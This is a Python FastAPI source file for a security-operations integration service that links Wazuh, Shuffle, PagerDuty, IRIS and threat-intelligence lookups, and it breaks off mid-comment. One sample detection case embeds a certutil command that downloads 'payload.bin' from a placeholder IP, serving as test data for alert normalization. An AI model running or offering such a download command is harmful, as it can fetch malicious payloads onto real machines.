# main.py — SOC integrator FastAPI application (export header carried no description).
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. from fastapi.responses import FileResponse, Response
  14. from fastapi.staticfiles import StaticFiles
  15. from app.adapters.abuseipdb import AbuseIpdbAdapter
  16. from app.adapters.geoip import GeoIpAdapter
  17. from app.adapters.iris import IrisAdapter
  18. from app.adapters.pagerduty import PagerDutyAdapter
  19. from app.adapters.shuffle import ShuffleAdapter
  20. from app.adapters.virustotal import VirusTotalAdapter
  21. from app.adapters.wazuh import WazuhAdapter
  22. from app.config import settings
  23. from app.db import get_conn, init_schema
  24. from app.models import (
  25. ActionCreateIncidentRequest,
  26. ApiResponse,
  27. CDetectionEvaluateRequest,
  28. IocEnrichRequest,
  29. IocEvaluateRequest,
  30. IrisTicketCreateRequest,
  31. LogLossCheckRequest,
  32. LogLossStreamCheck,
  33. SimLogRunRequest,
  34. ShuffleLoginRequest,
  35. ShuffleProxyRequest,
  36. TriggerShuffleRequest,
  37. WazuhIngestRequest,
  38. )
  39. from app.repositories.mvp_repo import MvpRepository
  40. from app.routes.mvp import build_mvp_router
  41. from app.security import require_internal_api_key
  42. from app.services.mvp_service import MvpService
  43. from app.services.c_detection_service import CDetectionService
  44. app = FastAPI(title=settings.app_name, version="0.1.0")
  45. logger = logging.getLogger(__name__)
  46. UI_DIR = Path(__file__).resolve().parent / "ui"
  47. UI_ASSETS_DIR = UI_DIR / "assets"
  48. SIM_SCRIPTS_DIR = Path("/app/scripts")
  49. SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")
  50. wazuh_adapter = WazuhAdapter(
  51. base_url=settings.wazuh_base_url,
  52. username=settings.wazuh_username,
  53. password=settings.wazuh_password,
  54. indexer_url=settings.wazuh_indexer_url,
  55. indexer_username=settings.wazuh_indexer_username,
  56. indexer_password=settings.wazuh_indexer_password,
  57. )
  58. shuffle_adapter = ShuffleAdapter(
  59. base_url=settings.shuffle_base_url,
  60. api_key=settings.shuffle_api_key,
  61. )
  62. pagerduty_adapter = PagerDutyAdapter(
  63. base_url=settings.pagerduty_base_url,
  64. api_key=settings.pagerduty_api_key,
  65. )
  66. iris_adapter = IrisAdapter(
  67. base_url=settings.iris_base_url,
  68. api_key=settings.iris_api_key,
  69. )
  70. virustotal_adapter = VirusTotalAdapter(
  71. base_url=settings.virustotal_base_url,
  72. api_key=settings.virustotal_api_key,
  73. )
  74. abuseipdb_adapter = AbuseIpdbAdapter(
  75. base_url=settings.abuseipdb_base_url,
  76. api_key=settings.abuseipdb_api_key,
  77. )
  78. geoip_adapter = GeoIpAdapter(
  79. provider=settings.geoip_provider,
  80. cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
  81. )
  82. repo = MvpRepository()
  83. mvp_service = MvpService(
  84. repo=repo,
  85. wazuh_adapter=wazuh_adapter,
  86. shuffle_adapter=shuffle_adapter,
  87. iris_adapter=iris_adapter,
  88. pagerduty_adapter=pagerduty_adapter,
  89. )
  90. c_detection_service = CDetectionService(
  91. repo=repo,
  92. geoip_adapter=geoip_adapter,
  93. )
  94. app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
  95. app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  96. @app.middleware("http")
  97. async def ui_no_cache_middleware(request: Request, call_next):
  98. response: Response = await call_next(request)
  99. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  100. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  101. response.headers["Pragma"] = "no-cache"
  102. response.headers["Expires"] = "0"
  103. return response
  104. DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
  105. {
  106. "name": "fortigate",
  107. "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
  108. "min_count": 1,
  109. },
  110. {
  111. "name": "windows_agent",
  112. "query": "full_log:windows_agent OR full_log:windows",
  113. "min_count": 1,
  114. },
  115. {
  116. "name": "vmware",
  117. "query": "full_log:vmware",
  118. "min_count": 1,
  119. },
  120. {
  121. "name": "log_monitor",
  122. "query": "full_log:log_monitor OR rule.id:100411",
  123. "min_count": 1,
  124. },
  125. ]
  126. async def _execute_log_loss_check(
  127. req: LogLossCheckRequest,
  128. create_ticket: bool,
  129. ) -> dict[str, object]:
  130. minutes = max(1, int(req.minutes))
  131. streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
  132. items: list[dict[str, object]] = []
  133. loss_count = 0
  134. error_count = 0
  135. loss_stream_names: list[str] = []
  136. for stream in streams:
  137. min_count = max(0, int(stream.min_count))
  138. try:
  139. observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
  140. is_loss = observed < min_count
  141. if is_loss:
  142. loss_count += 1
  143. loss_stream_names.append(stream.name)
  144. items.append(
  145. {
  146. "name": stream.name,
  147. "query": stream.query,
  148. "minutes": minutes,
  149. "min_count": min_count,
  150. "observed_count": observed,
  151. "status": "loss" if is_loss else "ok",
  152. }
  153. )
  154. except Exception as exc:
  155. error_count += 1
  156. items.append(
  157. {
  158. "name": stream.name,
  159. "query": stream.query,
  160. "minutes": minutes,
  161. "min_count": min_count,
  162. "observed_count": None,
  163. "status": "error",
  164. "error": str(exc),
  165. }
  166. )
  167. summary = {
  168. "total_streams": len(items),
  169. "loss_streams": loss_count,
  170. "error_streams": error_count,
  171. "all_ok": loss_count == 0 and error_count == 0,
  172. }
  173. ticket_data: dict[str, object] | None = None
  174. if create_ticket and loss_count > 0:
  175. cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
  176. now_ts = datetime.now(timezone.utc).timestamp()
  177. state = app.state.log_loss_monitor_state
  178. last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
  179. in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
  180. if not in_cooldown:
  181. title = f"Log loss detected ({loss_count} stream(s))"
  182. description = (
  183. f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
  184. f"Affected streams: {', '.join(loss_stream_names)}."
  185. )
  186. case_payload = {
  187. "case_name": title,
  188. "case_description": description,
  189. "case_customer": settings.iris_default_customer_id,
  190. "case_soc_id": settings.iris_default_soc_id,
  191. }
  192. try:
  193. iris_result = await iris_adapter.create_case(case_payload)
  194. state["last_ticket_ts"] = now_ts
  195. ticket_data = {"created": True, "iris": iris_result}
  196. except Exception as exc:
  197. ticket_data = {"created": False, "error": str(exc)}
  198. else:
  199. ticket_data = {
  200. "created": False,
  201. "skipped": "cooldown_active",
  202. "cooldown_seconds": cooldown,
  203. "last_ticket_ts": last_ticket_ts,
  204. }
  205. result: dict[str, object] = {
  206. "checked_at": datetime.now(timezone.utc).isoformat(),
  207. "minutes": minutes,
  208. "summary": summary,
  209. "streams": items,
  210. }
  211. if ticket_data is not None:
  212. result["ticket"] = ticket_data
  213. return result
  214. async def _log_loss_monitor_loop() -> None:
  215. interval = max(5, int(settings.log_loss_monitor_interval_seconds))
  216. while True:
  217. started_at = datetime.now(timezone.utc).isoformat()
  218. try:
  219. app.state.log_loss_monitor_state["running"] = True
  220. app.state.log_loss_monitor_state["last_started_at"] = started_at
  221. req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
  222. result = await _execute_log_loss_check(
  223. req=req,
  224. create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
  225. )
  226. app.state.log_loss_monitor_state["last_status"] = "ok"
  227. app.state.log_loss_monitor_state["last_result"] = result
  228. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  229. logger.info(
  230. "log-loss monitor checked=%s loss=%s errors=%s",
  231. result.get("summary", {}).get("total_streams", 0),
  232. result.get("summary", {}).get("loss_streams", 0),
  233. result.get("summary", {}).get("error_streams", 0),
  234. )
  235. except Exception as exc:
  236. app.state.log_loss_monitor_state["last_status"] = "error"
  237. app.state.log_loss_monitor_state["last_error"] = str(exc)
  238. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  239. logger.exception("log-loss monitor failed: %s", exc)
  240. finally:
  241. app.state.log_loss_monitor_state["running"] = False
  242. await asyncio.sleep(interval)
  243. async def _wazuh_auto_sync_loop() -> None:
  244. interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
  245. while True:
  246. started_at = datetime.now(timezone.utc).isoformat()
  247. try:
  248. app.state.wazuh_auto_sync_state["running"] = True
  249. app.state.wazuh_auto_sync_state["last_started_at"] = started_at
  250. result = await mvp_service.sync_wazuh_alerts(
  251. query=settings.wazuh_auto_sync_query,
  252. limit=settings.wazuh_auto_sync_limit,
  253. minutes=settings.wazuh_auto_sync_minutes,
  254. )
  255. app.state.wazuh_auto_sync_state["last_status"] = "ok"
  256. app.state.wazuh_auto_sync_state["last_result"] = result
  257. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  258. logger.info(
  259. "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
  260. result.get("processed", 0),
  261. result.get("ingested", 0),
  262. result.get("skipped_existing", 0),
  263. result.get("failed", 0),
  264. result.get("ioc_evaluated", 0),
  265. result.get("ioc_matched", 0),
  266. result.get("ioc_rejected", 0),
  267. )
  268. except Exception as exc:
  269. app.state.wazuh_auto_sync_state["last_status"] = "error"
  270. app.state.wazuh_auto_sync_state["last_error"] = str(exc)
  271. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  272. logger.exception("wazuh auto-sync failed: %s", exc)
  273. finally:
  274. app.state.wazuh_auto_sync_state["running"] = False
  275. await asyncio.sleep(interval)
  276. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  277. event = dict(match.get("event") or {})
  278. usecase_id = str(match.get("usecase_id") or "C-unknown")
  279. section = str(match.get("section") or "c")
  280. severity = str(match.get("severity") or "medium")
  281. entity = str(match.get("entity") or "unknown")
  282. evidence = dict(match.get("evidence") or {})
  283. source = str(event.get("source") or "wazuh")
  284. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  285. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  286. payload = dict(event.get("payload") or {})
  287. asset = dict(event.get("asset") or {})
  288. network = dict(event.get("network") or {})
  289. event_type = "c2_credential_abuse"
  290. if section == "c1":
  291. event_type = "c1_impossible_travel"
  292. elif section == "c3":
  293. event_type = "c3_lateral_movement"
  294. title = f"{usecase_id} detection for {entity}"
  295. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  296. tags = list(event.get("tags") or [])
  297. tags.extend(["appendix_c", usecase_id.lower(), section])
  298. return {
  299. "source": source,
  300. "event_type": event_type,
  301. "event_id": event_id,
  302. "timestamp": timestamp,
  303. "severity": severity,
  304. "title": title,
  305. "description": description,
  306. "asset": asset,
  307. "network": network,
  308. "tags": sorted(set(tags)),
  309. "risk_context": {"appendix_c_usecase": usecase_id},
  310. "raw": event.get("raw") or {},
  311. "payload": payload,
  312. }
  313. @app.on_event("startup")
  314. async def startup() -> None:
  315. init_schema()
  316. repo.ensure_policy()
  317. app.state.wazuh_auto_sync_state = {
  318. "running": False,
  319. "last_status": None,
  320. "last_started_at": None,
  321. "last_finished_at": None,
  322. "last_error": None,
  323. "last_result": None,
  324. }
  325. app.state.log_loss_monitor_state = {
  326. "running": False,
  327. "last_status": None,
  328. "last_started_at": None,
  329. "last_finished_at": None,
  330. "last_error": None,
  331. "last_result": None,
  332. "last_ticket_ts": 0.0,
  333. }
  334. app.state.c_detection_state = {
  335. "last_status": None,
  336. "last_started_at": None,
  337. "last_finished_at": None,
  338. "last_error": None,
  339. "last_result": None,
  340. "last_ticket_ts_by_key": {},
  341. }
  342. app.state.systems_monitor_state = {
  343. "last_ok_at": {},
  344. }
  345. app.state.sim_runs = {}
  346. SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
  347. if settings.wazuh_auto_sync_enabled:
  348. app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
  349. logger.info(
  350. "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
  351. settings.wazuh_auto_sync_interval_seconds,
  352. settings.wazuh_auto_sync_limit,
  353. settings.wazuh_auto_sync_minutes,
  354. settings.wazuh_auto_sync_query,
  355. )
  356. if settings.log_loss_monitor_enabled:
  357. app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
  358. logger.info(
  359. "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
  360. settings.log_loss_monitor_interval_seconds,
  361. settings.log_loss_monitor_window_minutes,
  362. settings.log_loss_monitor_create_iris_ticket,
  363. settings.log_loss_monitor_ticket_cooldown_seconds,
  364. )
  365. @app.on_event("shutdown")
  366. async def shutdown() -> None:
  367. task = getattr(app.state, "wazuh_auto_sync_task", None)
  368. if task:
  369. task.cancel()
  370. try:
  371. await task
  372. except asyncio.CancelledError:
  373. pass
  374. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  375. if ll_task:
  376. ll_task.cancel()
  377. try:
  378. await ll_task
  379. except asyncio.CancelledError:
  380. pass
  381. sim_runs = getattr(app.state, "sim_runs", {})
  382. for run in sim_runs.values():
  383. process = run.get("process")
  384. if process and process.poll() is None:
  385. process.terminate()
  386. @app.get(
  387. "/ui",
  388. summary="SOC Integrator UI",
  389. description="Serve the built-in Alpine.js operations console.",
  390. include_in_schema=False,
  391. )
  392. async def ui_index() -> FileResponse:
  393. if not UI_DIR.exists():
  394. raise HTTPException(status_code=404, detail="UI is not available in this build")
  395. return FileResponse(UI_DIR / "index.html")
  396. @app.get(
  397. "/health",
  398. response_model=ApiResponse,
  399. summary="Service health",
  400. description="Return soc-integrator service identity and configured upstream targets.",
  401. )
  402. async def health() -> ApiResponse:
  403. return ApiResponse(
  404. data={
  405. "service": settings.app_name,
  406. "env": settings.app_env,
  407. "targets": {
  408. "wazuh": settings.wazuh_base_url,
  409. "shuffle": settings.shuffle_base_url,
  410. "pagerduty": settings.pagerduty_base_url,
  411. "iris": settings.iris_base_url,
  412. },
  413. }
  414. )
  415. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  416. src_payload = dict(payload.payload or {})
  417. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  418. src_payload.setdefault("id", payload.alert_id)
  419. src_payload.setdefault(
  420. "rule",
  421. {
  422. "id": payload.rule_id or "unknown",
  423. "level": payload.severity if payload.severity is not None else 5,
  424. "description": payload.title or "Wazuh alert",
  425. },
  426. )
  427. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  428. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  429. normalized = {
  430. "source": payload.source,
  431. "alert_id": payload.alert_id,
  432. "rule_id": payload.rule_id,
  433. "severity": payload.severity,
  434. "title": payload.title,
  435. "payload": payload.payload,
  436. }
  437. hit = _build_wazuh_hit_from_ingest(payload)
  438. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  439. return {
  440. "normalized": normalized,
  441. "normalized_event": normalized_event,
  442. }
  443. @app.post(
  444. "/ingest/wazuh-alert",
  445. response_model=ApiResponse,
  446. summary="Normalize Wazuh alert",
  447. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  448. )
  449. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  450. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
  451. @app.get(
  452. "/ingest/wazuh-alert/samples",
  453. response_model=ApiResponse,
  454. summary="Sample normalization cases",
  455. description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
  456. )
  457. async def ingest_wazuh_alert_samples() -> ApiResponse:
  458. sample_payloads = [
  459. WazuhIngestRequest(
  460. source="wazuh",
  461. rule_id="110302",
  462. alert_id="sample-a1-02",
  463. severity=8,
  464. title="A1 production: DNS IOC domain match event",
  465. payload={
  466. "@timestamp": datetime.now(timezone.utc).isoformat(),
  467. "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
  468. "agent": {"name": "dns-fw-01", "id": "001"},
  469. },
  470. ),
  471. WazuhIngestRequest(
  472. source="wazuh",
  473. rule_id="110402",
  474. alert_id="sample-b1-02",
  475. severity=8,
  476. title="B1 production: ESXi SSH enabled",
  477. payload={
  478. "@timestamp": datetime.now(timezone.utc).isoformat(),
  479. "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
  480. "agent": {"name": "esxi-01", "id": "002"},
  481. },
  482. ),
  483. WazuhIngestRequest(
  484. source="wazuh",
  485. rule_id="110426",
  486. alert_id="sample-b3-06",
  487. severity=8,
  488. title="B3 production: CertUtil download pattern",
  489. payload={
  490. "@timestamp": datetime.now(timezone.utc).isoformat(),
  491. "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
  492. "agent": {"name": "win-sysmon-01", "id": "003"},
  493. },
  494. ),
  495. WazuhIngestRequest(
  496. source="wazuh",
  497. rule_id="110501",
  498. alert_id="sample-c1-01",
  499. severity=12,
  500. title="C1 production: Impossible travel",
  501. payload={
  502. "@timestamp": datetime.now(timezone.utc).isoformat(),
  503. "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
  504. "agent": {"name": "fgt-vpn-01", "id": "004"},
  505. },
  506. ),
  507. ]
  508. cases = []
  509. for item in sample_payloads:
  510. cases.append(
  511. {
  512. "name": str(item.alert_id),
  513. "request": item.model_dump(mode="json"),
  514. "result": _normalize_wazuh_ingest_payload(item),
  515. }
  516. )
  517. return ApiResponse(data={"cases": cases, "count": len(cases)})
  518. @app.post(
  519. "/action/create-incident",
  520. response_model=ApiResponse,
  521. summary="Create PagerDuty incident",
  522. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  523. )
  524. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  525. incident_payload = {
  526. "title": payload.title,
  527. "urgency": payload.severity,
  528. "incident_key": payload.dedupe_key,
  529. "body": payload.payload,
  530. "source": payload.source,
  531. }
  532. try:
  533. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  534. except Exception as exc:
  535. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  536. return ApiResponse(data={"pagerduty": pd_result})
  537. @app.post(
  538. "/action/trigger-shuffle",
  539. response_model=ApiResponse,
  540. summary="Trigger Shuffle workflow",
  541. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  542. )
  543. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  544. try:
  545. shuffle_result = await shuffle_adapter.trigger_workflow(
  546. workflow_id=payload.workflow_id,
  547. payload=payload.execution_argument,
  548. )
  549. except Exception as exc:
  550. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  551. return ApiResponse(data={"shuffle": shuffle_result})
  552. @app.get(
  553. "/shuffle/health",
  554. response_model=ApiResponse,
  555. summary="Shuffle health",
  556. description="Check Shuffle backend health endpoint through adapter connectivity.",
  557. )
  558. async def shuffle_health() -> ApiResponse:
  559. try:
  560. result = await shuffle_adapter.health()
  561. except Exception as exc:
  562. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  563. return ApiResponse(data={"shuffle": result})
  564. @app.get(
  565. "/shuffle/auth-test",
  566. response_model=ApiResponse,
  567. summary="Shuffle auth test",
  568. description="Validate Shuffle API key authentication.",
  569. )
  570. async def shuffle_auth_test() -> ApiResponse:
  571. try:
  572. result = await shuffle_adapter.auth_test()
  573. except Exception as exc:
  574. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  575. return ApiResponse(data={"shuffle": result})
  576. @app.post(
  577. "/shuffle/login",
  578. response_model=ApiResponse,
  579. summary="Shuffle login",
  580. description="Login to Shuffle with username/password and return auth response.",
  581. )
  582. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  583. try:
  584. result = await shuffle_adapter.login(payload.username, payload.password)
  585. except Exception as exc:
  586. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  587. return ApiResponse(data={"shuffle": result})
  588. @app.post(
  589. "/shuffle/generate-apikey",
  590. response_model=ApiResponse,
  591. summary="Generate Shuffle API key",
  592. description="Login using provided or configured credentials and generate a Shuffle API key.",
  593. )
  594. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  595. username = payload.username if payload else settings.shuffle_username
  596. password = payload.password if payload else settings.shuffle_password
  597. if not username or not password:
  598. raise HTTPException(
  599. status_code=400,
  600. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  601. )
  602. try:
  603. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  604. except Exception as exc:
  605. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  606. return ApiResponse(data={"shuffle": result})
  607. @app.get(
  608. "/shuffle/workflows",
  609. response_model=ApiResponse,
  610. summary="List Shuffle workflows",
  611. description="List available workflows in Shuffle using configured API key.",
  612. )
  613. async def shuffle_workflows() -> ApiResponse:
  614. try:
  615. result = await shuffle_adapter.list_workflows()
  616. except Exception as exc:
  617. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  618. return ApiResponse(data={"shuffle": result})
  619. @app.get(
  620. "/shuffle/workflows/{workflow_id}",
  621. response_model=ApiResponse,
  622. summary="Get Shuffle workflow",
  623. description="Get a single Shuffle workflow definition by workflow ID.",
  624. )
  625. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  626. try:
  627. result = await shuffle_adapter.get_workflow(workflow_id)
  628. except Exception as exc:
  629. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  630. return ApiResponse(data={"shuffle": result})
  631. @app.post(
  632. "/shuffle/workflows/{workflow_id}/execute",
  633. response_model=ApiResponse,
  634. summary="Execute Shuffle workflow",
  635. description="Execute a specific Shuffle workflow with custom JSON payload.",
  636. )
  637. async def shuffle_workflow_execute(
  638. workflow_id: str, payload: dict[str, object]
  639. ) -> ApiResponse:
  640. try:
  641. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  642. except Exception as exc:
  643. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  644. return ApiResponse(data={"shuffle": result})
  645. @app.get(
  646. "/shuffle/apps",
  647. response_model=ApiResponse,
  648. summary="List Shuffle apps",
  649. description="List installed/available Shuffle apps from app API.",
  650. )
  651. async def shuffle_apps() -> ApiResponse:
  652. try:
  653. result = await shuffle_adapter.list_apps()
  654. except Exception as exc:
  655. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  656. return ApiResponse(data={"shuffle": result})
  657. @app.post(
  658. "/shuffle/proxy",
  659. response_model=ApiResponse,
  660. summary="Proxy request to Shuffle API",
  661. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  662. )
  663. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  664. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  665. try:
  666. result = await shuffle_adapter.proxy(
  667. method=payload.method,
  668. path=path,
  669. params=payload.params,
  670. payload=payload.payload,
  671. )
  672. except Exception as exc:
  673. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  674. return ApiResponse(data={"shuffle": result})
  675. @app.post(
  676. "/action/create-iris-case",
  677. response_model=ApiResponse,
  678. summary="Create IRIS case (action)",
  679. description="Create an IRIS case using action payload fields and defaults.",
  680. )
  681. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  682. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  683. case_payload = {
  684. "case_name": payload.title,
  685. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  686. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  687. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  688. }
  689. try:
  690. iris_result = await iris_adapter.create_case(case_payload)
  691. except Exception as exc:
  692. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  693. return ApiResponse(data={"iris": iris_result})
  694. @app.post(
  695. "/iris/tickets",
  696. response_model=ApiResponse,
  697. summary="Create IRIS ticket",
  698. description="Create an IRIS case/ticket directly using ticket request model.",
  699. )
  700. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  701. case_payload = {
  702. "case_name": payload.title,
  703. "case_description": payload.description,
  704. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  705. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  706. }
  707. if payload.payload:
  708. case_payload.update(payload.payload)
  709. try:
  710. iris_result = await iris_adapter.create_case(case_payload)
  711. except Exception as exc:
  712. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  713. return ApiResponse(data={"iris": iris_result})
  714. @app.get(
  715. "/iris/tickets",
  716. response_model=ApiResponse,
  717. summary="List IRIS tickets",
  718. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  719. )
  720. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  721. try:
  722. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  723. except Exception as exc:
  724. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  725. return ApiResponse(data={"iris": iris_result})
  726. def _build_vt_ioc_result(
  727. vt: dict[str, object],
  728. ioc_type: str,
  729. ioc_value: str,
  730. malicious_threshold: int,
  731. suspicious_threshold: int,
  732. ) -> tuple[dict[str, object], bool, str, float]:
  733. stats = (
  734. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  735. if isinstance(vt, dict)
  736. else None
  737. ) or {}
  738. malicious = int(stats.get("malicious", 0) or 0)
  739. suspicious = int(stats.get("suspicious", 0) or 0)
  740. harmless = int(stats.get("harmless", 0) or 0)
  741. undetected = int(stats.get("undetected", 0) or 0)
  742. total = malicious + suspicious + harmless + undetected
  743. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  744. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  745. severity = "low"
  746. if malicious >= 5 or suspicious >= 10:
  747. severity = "critical"
  748. elif malicious >= 2 or suspicious >= 5:
  749. severity = "high"
  750. elif malicious >= 1 or suspicious >= 1:
  751. severity = "medium"
  752. reason = (
  753. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  754. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  755. )
  756. result: dict[str, object] = {
  757. "ioc_type": ioc_type,
  758. "ioc_value": ioc_value,
  759. "matched": matched,
  760. "severity": severity,
  761. "confidence": confidence,
  762. "reason": reason,
  763. "providers": {
  764. "virustotal": {
  765. "stats": stats,
  766. }
  767. },
  768. "raw": {
  769. "virustotal": vt,
  770. },
  771. }
  772. return result, matched, severity, confidence
  773. def _build_abuseipdb_ioc_result(
  774. abuse: dict[str, object],
  775. ioc_value: str,
  776. confidence_threshold: int = 50,
  777. ) -> tuple[dict[str, object], bool, str, float]:
  778. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  779. score = int(data.get("abuseConfidenceScore", 0) or 0)
  780. total_reports = int(data.get("totalReports", 0) or 0)
  781. matched = score >= confidence_threshold
  782. severity = "low"
  783. if score >= 90:
  784. severity = "critical"
  785. elif score >= 70:
  786. severity = "high"
  787. elif score >= 30:
  788. severity = "medium"
  789. confidence = round(score / 100.0, 4)
  790. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  791. result: dict[str, object] = {
  792. "ioc_type": "ip",
  793. "ioc_value": ioc_value,
  794. "matched": matched,
  795. "severity": severity,
  796. "confidence": confidence,
  797. "reason": reason,
  798. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  799. }
  800. return result, matched, severity, confidence
  801. def _extract_first_array(payload: object) -> list[object]:
  802. if isinstance(payload, list):
  803. return payload
  804. if not isinstance(payload, dict):
  805. return []
  806. preferred_keys = [
  807. "items",
  808. "results",
  809. "workflows",
  810. "apps",
  811. "affected_items",
  812. "data",
  813. ]
  814. for key in preferred_keys:
  815. value = payload.get(key)
  816. if isinstance(value, list):
  817. return value
  818. for value in payload.values():
  819. extracted = _extract_first_array(value)
  820. if extracted:
  821. return extracted
  822. return []
# Maps the API-facing simulation script alias (SimLogRunRequest.script) to the
